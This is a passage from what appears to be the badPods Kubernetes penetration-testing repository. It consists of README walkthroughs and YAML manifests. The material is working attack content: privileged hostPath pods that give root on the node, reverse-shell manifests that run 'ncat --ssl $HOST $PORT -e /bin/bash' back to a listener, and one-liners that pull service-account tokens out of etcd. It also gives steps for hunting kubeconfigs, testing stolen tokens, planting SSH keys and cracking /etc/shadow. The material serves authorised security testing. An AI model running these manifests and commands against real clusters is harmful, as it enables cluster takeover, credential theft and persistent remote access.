StatefulSet, ReplicaSet, ReplicationController, DaemonSet** 32 | 33 | * Replace [RESOURCE_TYPE] with deployment, statefulset, job, etc. 34 | 35 | ```bash 36 | kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/everything-allowed/[RESOURCE_TYPE]/everything-allowed-exec-[RESOURCE_TYPE].yaml 37 | kubectl get pods | grep everything-allowed-exec-[RESOURCE_TYPE] 38 | kubectl exec -it everything-allowed-exec-[RESOURCE_TYPE]-[ID] -- chroot /host bash 39 | ``` 40 | 41 | *Keep in mind that if a pod security policy blocks the pod, the resource type will still get created. The admission controller only blocks the pods that are created by the resource type.* 42 | 43 | To troubleshoot a case where you don't see pods, use `kubectl describe` 44 | 45 | ``` 46 | kubectl describe [RESOURCE_TYPE] everything-allowed-exec-[RESOURCE_TYPE] 47 | ``` 48 | 49 | ## Reverse shell pods 50 | Create one or more of these resources and catch the reverse shell. 51 | 52 | **Step 1: Set up listener** 53 | ```bash 54 | ncat --ssl -vlp 3116 55 | ``` 56 | 57 | **Step 2: Create the pod from the local manifest without modifying it, using environment variables and envsubst** 58 | 59 | * Replace [RESOURCE_TYPE] with deployment, statefulset, job, etc. 60 | * Replace the HOST and PORT values to point the reverse shell to your listener 61 | 62 | ```bash 63 | HOST="10.0.0.1" PORT="3116" envsubst < ./manifests/everything-allowed/[RESOURCE_TYPE]/everything-allowed-revshell-[RESOURCE_TYPE].yaml | kubectl apply -f - 64 | ``` 65 | 66 | **Step 3: Catch the shell and chroot to /host** 67 | ```bash 68 | $ ncat --ssl -vlp 3116 69 | Ncat: Generating a temporary 2048-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one. 70 | Ncat: Listening on :::3116 71 | Ncat: Listening on 0.0.0.0:3116 72 | Connection received on 10.0.0.162 42035 73 | # chroot /host 74 | ``` 75 | 76 | ## Deleting resources 77 | You can delete a resource using its manifest, or by name. 
Here are some examples: 78 | ``` 79 | kubectl delete [type] [resource-name] 80 | kubectl delete -f manifests/everything-allowed/pod/everything-allowed-exec-pod.yaml 81 | kubectl delete -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/everything-allowed/pod/everything-allowed-exec-pod.yaml 82 | kubectl delete pod everything-allowed-exec-pod 83 | kubectl delete cronjob everything-allowed-exec-cronjob 84 | ``` 85 | 86 | # Post exploitation 87 | 88 | ## Can you run your pod on a control-plane node? 89 | The pod you created above was likely scheduled on a worker node. Before jumping into post-exploitation on the worker node, it is worth seeing if you can run a pod on a control-plane node. If you can run your pod on a control-plane node using the nodeName selector in the pod spec, you might have easy access to the etcd database, which contains all of the configuration for the cluster, including all secrets. This is not possible on cloud-managed Kubernetes clusters like GKE and EKS, which hide the control plane. 90 | 91 | **Get nodes** 92 | ``` 93 | kubectl get nodes 94 | NAME STATUS ROLES AGE VERSION 95 | k8s-control-plane Ready master 93d v1.19.1 96 | k8s-worker Ready <none> 93d v1.19.1 97 | ``` 98 | 99 | **Pick your manifest, uncomment and update the nodeName field with the name of the control-plane node** 100 | ``` 101 | nodeName: k8s-control-plane 102 | ``` 103 | **Create your pod** 104 | ``` 105 | kubectl apply -f manifests/everything-allowed/job/everything-allowed-exec-job.yaml 106 | ``` 107 | 108 | ### Read secrets from etcd 109 | With a pod running on a control-plane node, you might have easy access to the `etcd` database, which contains all of the configuration for the cluster, including all secrets. 110 | 111 | Below is a quick and dirty way to grab secrets from `etcd` if it is running on the control-plane node you are on. If you want a more elegant solution that spins up a pod with the `etcd` client utility `etcdctl` and uses the control-plane node's credentials to connect to etcd wherever it is running, check out [this example manifest](https://github.com/mauilion/blackhat-2019/blob/master/etcd-attack/etcdclient.yaml) from @mauilion. 
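Alternatively, if you can get `etcdctl` into your pod, you can query etcd directly instead of carving strings out of the database file. A sketch, assuming the default `kubeadm` certificate locations and the standard etcd client port (drop the `/host` prefix if you have already chrooted):

```bash
export ETCDCTL_API=3
etcdctl --endpoints https://127.0.0.1:2379 \
  --cacert /host/etc/kubernetes/pki/etcd/ca.crt \
  --cert /host/etc/kubernetes/pki/etcd/server.crt \
  --key /host/etc/kubernetes/pki/etcd/server.key \
  get /registry/secrets --prefix --keys-only   # list the key of every secret in etcd
```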
112 | 113 | **Check to see if `etcd` is running on the control-plane node and see where the database is (this example is from a `kubeadm`-created cluster)** 114 | ``` 115 | root@k8s-control-plane:/var/lib/etcd/member/wal# ps -ef | grep etcd | sed s/\-\-/\\n/g | grep data-dir 116 | ``` 117 | Output: 118 | ``` 119 | data-dir=/var/lib/etcd 120 | ``` 121 | **View the data in the etcd database:** 122 | ``` 123 | strings /var/lib/etcd/member/snap/db | less 124 | ``` 125 | 126 | **Extract the tokens from the database and show the service account name** 127 | ``` 128 | db=`strings /var/lib/etcd/member/snap/db`; for x in `echo "$db" | grep eyJhbGciOiJ`; do name=`echo "$db" | grep $x -B40 | grep registry`; echo $name \| $x; echo; done 129 | ``` 130 | 131 | **Same command, but some greps to only return the default token in the kube-system namespace** 132 | ``` 133 | db=`strings /var/lib/etcd/member/snap/db`; for x in `echo "$db" | grep eyJhbGciOiJ`; do name=`echo "$db" | grep $x -B40 | grep registry`; echo $name \| $x; echo; done | grep kube-system | grep default 134 | ``` 135 | Output: 136 | ``` 137 | 1/registry/secrets/kube-system/default-token-d82kb | eyJhbGciOiJSUzI1NiIsImtpZCI6IkplRTc0X2ZP[REDACTED] 138 | ``` 139 | 140 | 141 | ## Look for kubeconfigs in the host filesystem 142 | 143 | By default, nodes don't have `kubectl` installed. If you are lucky though, an administrator tried to make their life (and yours) a little easier by installing `kubectl` and their highly privileged credentials on the node. (We weren't so lucky on the GKE node we tested.) 144 | 145 | **Some ideas:** 146 | ```bash 147 | find / -name kubeconfig 148 | find / -name .kube 149 | grep -R "current-context" /home/ 150 | grep -R "current-context" /root/ 151 | ``` 152 | 153 | ## Grab all tokens from all pods on the system 154 | You can access any secret mounted within any pod on the node you are on. In a production cluster, even on a worker node, there is usually at least one pod that has a mounted *token* that is bound to a *service account* that is bound to a *clusterrolebinding*, which gives you access to do things like create pods or view secrets in all namespaces. 155 | 156 | Look for tokens that have permissions to get secrets in kube-system. 
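The heart of the technique is simple enough to run by hand. A minimal sketch, assuming `kubectl` is available in the pod and the host filesystem is mounted at `/host` (the `can-they.sh` helper described next automates this):

```bash
# Try every mounted service account token against a single can-i check
for token in /host/var/lib/kubelet/pods/*/volumes/kubernetes.io~secret/*/token; do
  echo "Token: $token"
  kubectl --token="$(cat "$token")" auth can-i list secrets -n kube-system
done
```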
157 | 158 | **Copy the `can-they.sh` helper script to the pod, download it from GitHub, or manually create it** 159 | ``` 160 | kubectl cp scripts/can-they.sh everything-allowed-exec-pod:/ 161 | ``` 162 | 163 | **What does `can-they.sh` do?** 164 | 165 | * Installs curl and kubectl in the pod (if not installed) 166 | * Grabs all of the tokens from `/host/var/lib/kubelet/pods/*` 167 | * Runs each token against the `selfsubjectaccessreviews` endpoint: `kubectl --token=$token auth can-i [$user-input]` 168 | 169 | **Exec into pod (Don't chroot)** 170 | ``` 171 | kubectl exec -it everything-allowed-exec-pod -- bash 172 | chmod +x can-they.sh 173 | ``` 174 | 175 | **Run `can-they.sh`** 176 | ``` 177 | ./can-they.sh 178 | ./can-they.sh -i "--list -n kube-system" 179 | ./can-they.sh -i "--list -n default" 180 | ./can-they.sh -i "list secrets -n kube-system" 181 | ./can-they.sh -i "create pods -n kube-system" 182 | ./can-they.sh -i "create clusterrolebindings" 183 | ``` 184 | 185 | **Example run on AKS showing gatekeeper-admin-token-jmw8z can list secrets in kube-system** 186 | ``` 187 | root@aks-agentpool-76920337-vmss000000:/# ./can-they.sh -i "list secrets -n kube-system" 188 | -------------------------------------------------------- 189 | Token Location: /host/var/lib/kubelet/pods/c888d3a8-743e-41dd-8464-91b3e6628174/volumes/kubernetes.io~secret/gatekeeper-admin-token-jmw8z/token 190 | Command: kubectl auth can-i list secrets -n kube-system 191 | yes 192 | 193 | -------------------------------------------------------- 194 | Token Location: /host/var/lib/kubelet/pods/d13e311b-affa-4fad-b1c4-ec4f7817fd98/volumes/kubernetes.io~secret/metrics-server-token-ftxxd/token 195 | Command: kubectl auth can-i list secrets -n kube-system 196 | no 197 | 198 | ...omitted for brevity... 199 | ``` 200 | 201 | **Can any of the tokens:** 202 | * Create a pod, deployment, etc. in the kube-system namespace? 203 | * Create a role in the kube-system namespace? 204 | * View secrets in the kube-system namespace? 205 | * Create clusterrolebindings? 206 | 207 | You are looking for a way to access all resources in all namespaces. 208 | 209 | 210 | ## Some other ideas 211 | * Add your public key to `authorized_keys` on the node and SSH to it (see the sketch at the end of this README) 212 | * Crack password hashes from /etc/shadow and see if you can use them to access control-plane nodes 213 | * Look at the volumes that each of the pods has mounted. You might find some pretty sensitive stuff in there. 214 | 215 | ## Attacks that apply to all pods, even without any special permissions 216 | 217 | **To see these in more detail, head over to [nothing-allowed/README.md](../nothing-allowed)** 218 | * Access the cloud metadata service 219 | * `Kube-apiserver` or `kubelet` with `anonymous-auth` enabled 220 | * Kubernetes exploits 221 | * Hunting for vulnerable applications and services in the cluster 222 | 223 | 224 | # Demonstrate impact 225 | 226 | If you are performing a penetration test, the end goal is not to gain cluster-admin, but rather to demonstrate the impact of exploitation. Use the access you have gained to accomplish the objectives of the penetration test. 
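As a sketch of the SSH idea from the "Some other ideas" list above, run from the chrooted shell on the node (assuming the node runs `sshd` and permits root key logins; the key shown is a placeholder):

```bash
# From within chroot /host on the node
mkdir -p /root/.ssh
echo 'ssh-ed25519 AAAA...your-public-key... attacker@box' >> /root/.ssh/authorized_keys

# Then from your own machine (node IP from `kubectl get nodes -o wide`):
ssh root@<node-ip>
```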
228 | 229 | 230 | # References and further reading: 231 | * [The Most Pointless Kubernetes Command Ever](https://raesene.github.io/blog/2019/04/01/The-most-pointless-kubernetes-command-ever/) 232 | * [Secure Kubernetes - KubeCon NA 2019 CTF](https://securekubernetes.com/) 233 | * Command and KubeCTL: Real-World Kubernetes Security for Pentesters - [Talk](https://www.youtube.com/watch?v=cRbHILH4f0A) / [Blog](https://research.nccgroup.com/2020/02/12/command-and-kubectl-talk-follow-up/) 234 | * Compromising Kubernetes Cluster by Exploiting RBAC Permissions - [Talk](https://www.youtube.com/watch?v=1LMo0CftVC4) / [Slides](https://published-prd.lanyonevents.com/published/rsaus20/sessionsFiles/18100/2020_USA20_DSO-W01_01_Compromising%20Kubernetes%20Cluster%20by%20Exploiting%20RBAC%20Permissions.pdf) 235 | * The Path Less Traveled: Abusing Kubernetes Defaults - [Talk](https://www.youtube.com/watch?v=HmoVSmTIOxM) / [Repository](https://github.com/mauilion/blackhat-2019) 236 | 237 | -------------------------------------------------------------------------------- /manifests/everything-allowed/cronjob/everything-allowed-exec-cronjob.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: batch/v1beta1 2 | kind: CronJob 3 | metadata: 4 | name: everything-allowed-exec-cronjob 5 | labels: 6 | app: pentest 7 | type: cronjob 8 | spec: 9 | schedule: "*/1 * * * *" 10 | concurrencyPolicy: Forbid 11 | jobTemplate: 12 | spec: 13 | template: 14 | spec: 15 | hostNetwork: true 16 | hostPID: true 17 | hostIPC: true 18 | containers: 19 | - name: everything-allowed-exec-cronjob 20 | image: ubuntu 21 | securityContext: 22 | privileged: true 23 | volumeMounts: 24 | - mountPath: /host 25 | name: noderoot 26 | command: [ "/bin/sh", "-c", "--" ] 27 | args: [ "while true; do sleep 30; done;" ] 28 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 29 | volumes: 30 | - name: noderoot 31 | hostPath: 32 | path: / 33 | restartPolicy: OnFailure 34 | -------------------------------------------------------------------------------- /manifests/everything-allowed/cronjob/everything-allowed-revshell-cronjob.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: batch/v1beta1 2 | kind: CronJob 3 | metadata: 4 | name: everything-allowed-revshell-cronjob 5 | labels: 6 | app: pentest 7 | spec: 8 | schedule: "*/1 * * * *" 9 | concurrencyPolicy: Forbid 10 | jobTemplate: 11 | spec: 12 | template: 13 | spec: 14 | hostNetwork: true 15 | hostPID: true 16 | hostIPC: true 17 | containers: 18 | - name: everything-allowed-revshell-cronjob 19 | image: raesene/ncat 20 | command: [ "/bin/sh", "-c", "--" ] 21 | args: [ "ncat --ssl $HOST $PORT -e /bin/bash;" ] 22 | securityContext: 23 | privileged: true 24 | volumeMounts: 25 | - mountPath: /host 26 | name: noderoot 27 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 28 | volumes: 29 | - name: noderoot 30 | hostPath: 31 | path: / 32 | restartPolicy: OnFailure 33 | -------------------------------------------------------------------------------- /manifests/everything-allowed/deamonset/everything-allowed-exec-deamonset.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: apps/v1 2 | kind: DaemonSet 3 | metadata: 4 | name: everything-allowed-exec-daemonset 5 | 
labels: 6 | app: pentest 7 | type: daemonset 8 | spec: 9 | selector: 10 | matchLabels: 11 | app: pentest 12 | type: daemonset 13 | template: 14 | metadata: 15 | labels: 16 | app: pentest 17 | type: daemonset 18 | spec: 19 | hostNetwork: true 20 | hostPID: true 21 | hostIPC: true 22 | containers: 23 | - name: everything-allowed-exec-daemonset 24 | image: ubuntu 25 | securityContext: 26 | privileged: true 27 | volumeMounts: 28 | - mountPath: /host 29 | name: noderoot 30 | command: [ "/bin/sh", "-c", "--" ] 31 | args: [ "while true; do sleep 30; done;" ] 32 | #nodeName: k8s-control-plane # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 33 | volumes: 34 | - name: noderoot 35 | hostPath: 36 | path: / 37 | 38 | -------------------------------------------------------------------------------- /manifests/everything-allowed/deamonset/everything-allowed-revshell-deamonset.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: apps/v1 2 | kind: DaemonSet 3 | metadata: 4 | name: everything-allowed-revshell-daemonset 5 | labels: 6 | app: pentest 7 | type: daemonset 8 | spec: 9 | selector: 10 | matchLabels: 11 | app: pentest 12 | type: daemonset 13 | template: 14 | metadata: 15 | labels: 16 | app: pentest 17 | type: daemonset 18 | spec: 19 | hostNetwork: true 20 | hostPID: true 21 | hostIPC: true 22 | containers: 23 | - name: everything-allowed-revshell-daemonset 24 | image: raesene/ncat 25 | command: [ "/bin/sh", "-c", "--" ] 26 | args: [ "ncat --ssl $HOST $PORT -e /bin/bash;" ] 27 | securityContext: 28 | privileged: true 29 | volumeMounts: 30 | - mountPath: /host 31 | name: noderoot 32 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 33 | volumes: 34 | - name: noderoot 35 | hostPath: 36 | path: / 37 | -------------------------------------------------------------------------------- /manifests/everything-allowed/deployment/everything-allowed-exec-deployment.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: apps/v1 2 | kind: Deployment 3 | metadata: 4 | name: everything-allowed-exec-deployment 5 | labels: 6 | app: pentest 7 | type: deployment 8 | spec: 9 | replicas: 2 10 | selector: 11 | matchLabels: 12 | app: pentest 13 | type: deployment 14 | template: 15 | metadata: 16 | labels: 17 | app: pentest 18 | type: deployment 19 | spec: 20 | hostNetwork: true 21 | hostPID: true 22 | hostIPC: true 23 | containers: 24 | - name: everything-allowed-exec-deployment 25 | image: ubuntu 26 | securityContext: 27 | privileged: true 28 | volumeMounts: 29 | - mountPath: /host 30 | name: noderoot 31 | command: [ "/bin/sh", "-c", "--" ] 32 | args: [ "while true; do sleep 30; done;" ] 33 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 34 | volumes: 35 | - name: noderoot 36 | hostPath: 37 | path: / 38 | -------------------------------------------------------------------------------- /manifests/everything-allowed/deployment/everything-allowed-revshell-deployment.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: apps/v1 2 | kind: Deployment 3 | metadata: 4 | name: everything-allowed-revshell-deployment 5 | labels: 6 | app: pentest 7 | type: deployment 8 | spec: 9 | replicas: 2 10 | selector: 11 | 
matchLabels: 12 | app: pentest 13 | type: deployment 14 | template: 15 | metadata: 16 | labels: 17 | app: pentest 18 | type: deployment 19 | spec: 20 | hostNetwork: true 21 | hostPID: true 22 | hostIPC: true 23 | containers: 24 | - name: everything-allowed-revshell-deployment 25 | image: raesene/ncat 26 | command: [ "/bin/sh", "-c", "--" ] 27 | args: [ "ncat --ssl $HOST $PORT -e /bin/bash;" ] 28 | securityContext: 29 | privileged: true 30 | volumeMounts: 31 | - mountPath: /host 32 | name: noderoot 33 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 34 | volumes: 35 | - name: noderoot 36 | hostPath: 37 | path: / 38 | -------------------------------------------------------------------------------- /manifests/everything-allowed/job/everything-allowed-exec-job.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: batch/v1 2 | kind: Job 3 | metadata: 4 | name: everything-allowed-exec-job 5 | labels: 6 | app: pentest 7 | type: job 8 | spec: 9 | template: 10 | spec: 11 | hostNetwork: true 12 | hostPID: true 13 | hostIPC: true 14 | containers: 15 | - name: everything-allowed-exec-job 16 | image: ubuntu 17 | securityContext: 18 | privileged: true 19 | volumeMounts: 20 | - mountPath: /host 21 | name: noderoot 22 | command: [ "/bin/sh", "-c", "--" ] 23 | args: [ "while true; do sleep 30; done;" ] 24 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 25 | volumes: 26 | - name: noderoot 27 | hostPath: 28 | path: / 29 | restartPolicy: OnFailure 30 | -------------------------------------------------------------------------------- /manifests/everything-allowed/job/everything-allowed-revshell-job.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: batch/v1 2 | kind: Job 3 | metadata: 4 | name: everything-allowed-revshell-job 5 | labels: 6 | app: pentest 7 | type: job 8 | spec: 9 | template: 10 | spec: 11 | hostNetwork: true 12 | hostPID: true 13 | hostIPC: true 14 | containers: 15 | - name: everything-allowed-revshell-job 16 | image: raesene/ncat 17 | command: [ "/bin/sh", "-c", "--" ] 18 | args: [ "ncat --ssl $HOST $PORT -e /bin/bash;" ] 19 | securityContext: 20 | privileged: true 21 | volumeMounts: 22 | - mountPath: /host 23 | name: noderoot 24 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 25 | volumes: 26 | - name: noderoot 27 | hostPath: 28 | path: / 29 | restartPolicy: OnFailure 30 | -------------------------------------------------------------------------------- /manifests/everything-allowed/pod/everything-allowed-exec-pod.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: Pod 3 | metadata: 4 | name: everything-allowed-exec-pod 5 | labels: 6 | app: pentest 7 | spec: 8 | hostNetwork: true 9 | hostPID: true 10 | hostIPC: true 11 | containers: 12 | - name: everything-allowed-pod 13 | image: ubuntu 14 | securityContext: 15 | privileged: true 16 | volumeMounts: 17 | - mountPath: /host 18 | name: noderoot 19 | command: [ "/bin/sh", "-c", "--" ] 20 | args: [ "while true; do sleep 30; done;" ] 21 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a 
control-plane node name 22 | volumes: 23 | - name: noderoot 24 | hostPath: 25 | path: / 26 | -------------------------------------------------------------------------------- /manifests/everything-allowed/pod/everything-allowed-revshell-pod.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: Pod 3 | metadata: 4 | name: everything-allowed-revshell-pod 5 | labels: 6 | app: pentest 7 | spec: 8 | hostNetwork: true 9 | hostPID: true 10 | hostIPC: true 11 | containers: 12 | - name: everything-allowed-pod 13 | image: raesene/ncat 14 | command: [ "/bin/sh", "-c", "--" ] 15 | args: [ "ncat --ssl $HOST $PORT -e /bin/bash;" ] 16 | securityContext: 17 | privileged: true 18 | volumeMounts: 19 | - mountPath: /host 20 | name: noderoot 21 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 22 | volumes: 23 | - name: noderoot 24 | hostPath: 25 | path: / 26 | -------------------------------------------------------------------------------- /manifests/everything-allowed/replicaset/everything-allowed-exec-replicaset.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: apps/v1 2 | kind: ReplicaSet 3 | metadata: 4 | name: everything-allowed-exec-replicaset 5 | labels: 6 | app: pentest 7 | type: replicaset 8 | spec: 9 | replicas: 2 10 | selector: 11 | matchLabels: 12 | type: replicaset 13 | template: 14 | metadata: 15 | labels: 16 | app: pentest 17 | type: replicaset 18 | spec: 19 | hostNetwork: true 20 | hostPID: true 21 | hostIPC: true 22 | containers: 23 | - name: everything-allowed-exec-replicaset 24 | image: ubuntu 25 | securityContext: 26 | privileged: true 27 | volumeMounts: 28 | - mountPath: /host 29 | name: noderoot 30 | command: [ "/bin/sh", "-c", "--" ] 31 | args: [ "while true; do sleep 30; done;" ] 32 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 33 | volumes: 34 | - name: noderoot 35 | hostPath: 36 | path: / 37 | -------------------------------------------------------------------------------- /manifests/everything-allowed/replicaset/everything-allowed-revshell-replicaset.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: apps/v1 2 | kind: ReplicaSet 3 | metadata: 4 | name: everything-allowed-revshell-replicaset 5 | labels: 6 | app: pentest 7 | type: replicaset 8 | spec: 9 | replicas: 2 10 | selector: 11 | matchLabels: 12 | type: replicaset 13 | template: 14 | metadata: 15 | labels: 16 | app: pentest 17 | type: replicaset 18 | spec: 19 | hostNetwork: true 20 | hostPID: true 21 | hostIPC: true 22 | containers: 23 | - name: everything-allowed-revshell-replicaset 24 | image: raesene/ncat 25 | command: [ "/bin/sh", "-c", "--" ] 26 | args: [ "ncat --ssl $HOST $PORT -e /bin/bash;" ] 27 | securityContext: 28 | privileged: true 29 | volumeMounts: 30 | - mountPath: /host 31 | name: noderoot 32 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 33 | volumes: 34 | - name: noderoot 35 | hostPath: 36 | path: / 37 | -------------------------------------------------------------------------------- /manifests/everything-allowed/replicationcontroller/everything-allowed-exec-replicationcontroller.yaml: 
-------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: ReplicationController 3 | metadata: 4 | name: everything-allowed-exec-replicationcontroller 5 | labels: 6 | app: pentest 7 | type: replicationcontroller 8 | spec: 9 | replicas: 2 10 | selector: 11 | app: pentest 12 | type: replicationcontroller 13 | template: 14 | metadata: 15 | labels: 16 | app: pentest 17 | type: replicationcontroller 18 | spec: 19 | hostNetwork: true 20 | hostPID: true 21 | hostIPC: true 22 | containers: 23 | - name: everything-allowed-exec-replicationcontroller 24 | image: ubuntu 25 | securityContext: 26 | privileged: true 27 | volumeMounts: 28 | - mountPath: /host 29 | name: noderoot 30 | command: [ "/bin/sh", "-c", "--" ] 31 | args: [ "while true; do sleep 30; done;" ] 32 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 33 | volumes: 34 | - name: noderoot 35 | hostPath: 36 | path: / 37 | -------------------------------------------------------------------------------- /manifests/everything-allowed/replicationcontroller/everything-allowed-revshell-replicationcontroller.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: ReplicationController 3 | metadata: 4 | name: everything-allowed-revshell-replicationcontroller 5 | labels: 6 | app: pentest 7 | type: replicationcontroller 8 | spec: 9 | replicas: 2 10 | selector: 11 | app: pentest 12 | type: replicationcontroller 13 | template: 14 | metadata: 15 | labels: 16 | app: pentest 17 | type: replicationcontroller 18 | spec: 19 | hostNetwork: true 20 | hostPID: true 21 | hostIPC: true 22 | containers: 23 | - name: everything-allowed-revshell-replicationcontroller 24 | image: raesene/ncat 25 | command: [ "/bin/sh", "-c", "--" ] 26 | args: [ "ncat --ssl $HOST $PORT -e /bin/bash;" ] 27 | securityContext: 28 | privileged: true 29 | volumeMounts: 30 | - mountPath: /host 31 | name: noderoot 32 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 33 | volumes: 34 | - name: noderoot 35 | hostPath: 36 | path: / 37 | -------------------------------------------------------------------------------- /manifests/everything-allowed/statefulset/everything-allowed-exec-statefulset.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: Service 3 | metadata: 4 | name: everything-allowed-exec-statefulset-service 5 | labels: 6 | app: pentest 7 | spec: 8 | ports: 9 | - port: 4444 10 | name: everything-allowed-exec-statefulset-service 11 | clusterIP: None 12 | selector: 13 | app: pentest 14 | --- 15 | apiVersion: apps/v1 16 | kind: StatefulSet 17 | metadata: 18 | name: everything-allowed-exec-statefulset 19 | labels: 20 | app: pentest 21 | type: statefulset 22 | spec: 23 | serviceName: "pentest" 24 | replicas: 2 25 | selector: 26 | matchLabels: 27 | app: pentest 28 | type: statefulset 29 | template: 30 | metadata: 31 | labels: 32 | app: pentest 33 | type: statefulset 34 | spec: 35 | hostNetwork: true 36 | hostPID: true 37 | hostIPC: true 38 | containers: 39 | - name: everything-allowed-exec-statefulset 40 | image: ubuntu 41 | securityContext: 42 | privileged: true 43 | volumeMounts: 44 | - mountPath: /host 45 | name: noderoot 46 | command: [ "/bin/sh", "-c", "--" ] 47 | args: [ "while true; do sleep 30; done;" ] 48 | 
#nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 49 | volumes: 50 | - name: noderoot 51 | hostPath: 52 | path: / 53 | -------------------------------------------------------------------------------- /manifests/everything-allowed/statefulset/everything-allowed-revshell-statefulset.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: Service 3 | metadata: 4 | name: everything-allowed-revshell-statefulset-service 5 | labels: 6 | app: pentest 7 | spec: 8 | ports: 9 | - port: 4444 10 | name: everything-allowed-revshell-statefulset-service 11 | clusterIP: None 12 | selector: 13 | app: pentest 14 | --- 15 | apiVersion: apps/v1 16 | kind: StatefulSet 17 | metadata: 18 | name: everything-allowed-revshell-statefulset 19 | labels: 20 | app: pentest 21 | type: statefulset 22 | spec: 23 | serviceName: "pentest" 24 | replicas: 2 25 | selector: 26 | matchLabels: 27 | app: pentest 28 | type: statefulset 29 | template: 30 | metadata: 31 | labels: 32 | app: pentest 33 | type: statefulset 34 | spec: 35 | hostNetwork: true 36 | hostPID: true 37 | hostIPC: true 38 | containers: 39 | - name: everything-allowed-revshell-statefulset 40 | image: raesene/ncat 41 | command: [ "/bin/sh", "-c", "--" ] 42 | args: [ "ncat --ssl $HOST $PORT -e /bin/bash;" ] 43 | securityContext: 44 | privileged: true 45 | volumeMounts: 46 | - mountPath: /host 47 | name: noderoot 48 | #nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name 49 | volumes: 50 | - name: noderoot 51 | hostPath: 52 | path: / 53 | -------------------------------------------------------------------------------- /manifests/hostipc/README.md: -------------------------------------------------------------------------------- 1 | # Bad Pod #7: hostIPC 2 | ![](../../.github/images/Pod7.jpg) 3 | 4 | If you only have `hostIPC=true`, you most likely can't do much. However, if any process on the host, or any process within another pod, is using the host’s inter-process communication mechanisms (shared memory, semaphore arrays, message queues, etc.), you'll be able to read/write to those same mechanisms. The first place you'll want to look is `/dev/shm`, as it is shared between any pod with `hostIPC=true` and the host. You'll also want to check out the other IPC mechanisms with `ipcs`. 5 | 6 | * **Inspect /dev/shm** - Look for any files in this shared memory location. 7 | * **Inspect existing IPC facilities** – You can check to see if any IPC facilities are being used with `/usr/bin/ipcs` (see the sketch below).
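A quick way to convince yourself that the IPC namespace really is shared is to create a test object on one side and list it from the other. This is only a sketch, and it assumes the util-linux `ipcmk`/`ipcs` tools are present on both sides:

```bash
# On the host (or in any other pod with hostIPC=true): create test IPC objects
ipcmk -M 1024   # shared memory segment of 1024 bytes
ipcmk -Q        # message queue

# From your hostIPC pod: both objects are visible because the IPC namespace is shared
ipcs -m   # list shared memory segments
ipcs -q   # list message queues
```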
8 | 9 | 10 | ## Table of Contents 11 | - [Pod creation & access](#pod-creation--access) 12 | - [Exec pods](#exec-pods) 13 | - [Reverse shell pods](#reverse-shell-pods) 14 | - [Deleting resources](#deleting-resources) 15 | - [Post exploitation](#post-exploitation) 16 | - [Inspect /dev/shm - Look for any files in this shared memory location.](#inspect-devshm---look-for-any-files-in-this-shared-memory-location) 17 | - [Look for any use of inter-process communication on the host](#look-for-any-use-of-inter-process-communication-on-the-host) 18 | - [Attacks that apply to all pods, even without any special permissions](#attacks-that-apply-to-all-pods-even-without-any-special-permissions) 19 | - [Demonstrate impact](#demonstrate-impact) 20 | - [References and further reading:](#references-and-further-reading) 21 | 22 | # Pod creation & access 23 | 24 | ## Exec pods 25 | Create one or more of these resource types and exec into the pod 26 | 27 | **Pod** 28 | ```bash 29 | kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/hostipc/pod/hostipc-exec-pod.yaml 30 | kubectl exec -it hostipc-exec-pod -- bash 31 | ``` 32 | **Job, CronJob, Deployment, StatefulSet, ReplicaSet, ReplicationController, DaemonSet** 33 | 34 | * Replace [RESOURCE_TYPE] with deployment, statefulset, job, etc. 35 | 36 | ```bash 37 | kubectl apply -f https://raw.githubusercontent.com/BishopFox/badPods/main/manifests/hostipc/[RESOURCE_TYPE]/hostipc-exec-[RESOURCE_TYPE].yaml 38 | kubectl get pods | grep hostipc-exec-[RESOURCE_TYPE] 39 | kubectl exec -it hostipc-exec-[RESOURCE_TYPE]-[ID] -- bash 40 | ``` 41 | 42 | *Keep in mind that even if a pod security policy blocks the pod, the parent resource will still be created; the admission controller only blocks the pods that the resource tries to create.* 43 | 44 | To troubleshoot a case where you don't see pods, use 